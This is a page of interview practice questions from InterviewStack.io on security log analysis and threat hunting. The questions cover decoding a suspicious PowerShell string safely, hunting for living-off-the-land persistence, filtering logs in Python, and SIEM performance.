InterviewStack.io LogoInterviewStack.io

Log Analysis and Threat Hunting in Security Data Questions

Understand how to analyze security logs to identify suspicious activity. Know what different types of logs show (firewall, proxy, DNS, endpoint, application). Be able to correlate logs from multiple sources to trace attacker activity. Discuss threat hunting methodologies and how analysts proactively search for unknown threats in data.

MediumTechnical
100 practiced
You find a base64-encoded PowerShell string in a proxy query parameter. Describe step-by-step how you would safely decode and analyze it, including safe analysis environment setup, static analysis steps, behavioral checks, and ways to hunt for other hosts exhibiting the same payload or command patterns.
HardTechnical
79 practiced
A sophisticated attacker uses living-off-the-land binaries (LOLBAS) and scheduled tasks to persist on endpoints and exfiltrate slowly via small periodic uploads. Draft a comprehensive threat-hunting plan: hypotheses, required telemetry, analytic detections (including anomaly baselines), containment procedures, and how you'd measure hunt success.
MediumTechnical
93 practiced
Describe the structure and logic of a short Python script that reads newline-delimited JSON logs (large files), extracts events where 'user' != 'system' and 'action' == 'file_upload' and 'size_bytes' > 10485760 (10MB), and outputs a CSV with host, user, filename, size and timestamp. Explain performance considerations and how you'd modify it for streaming data.
EasyTechnical
74 practiced
In Splunk and Elasticsearch, what are sourcetypes (Splunk) or index/mappings (Elasticsearch)? Explain why consistent parsing and field extraction is critical for effective threat hunting. Include consequences of poor parsing and examples of how you'd normalize fields across diverse data sources.
MediumSystem Design
100 practiced
Your SIEM is suffering from slow queries due to very high-cardinality fields and growing data volumes. Propose architectural and operational approaches to optimize storage and query performance without losing key hunting capabilities. Cover indexing strategies, hot/cold storage, rollups, and query-time optimizations.

Unlock Full Question Bank

Get access to hundreds of Log Analysis and Threat Hunting in Security Data interview questions and detailed answers.

Sign in to Continue

Join thousands of developers preparing for their dream job.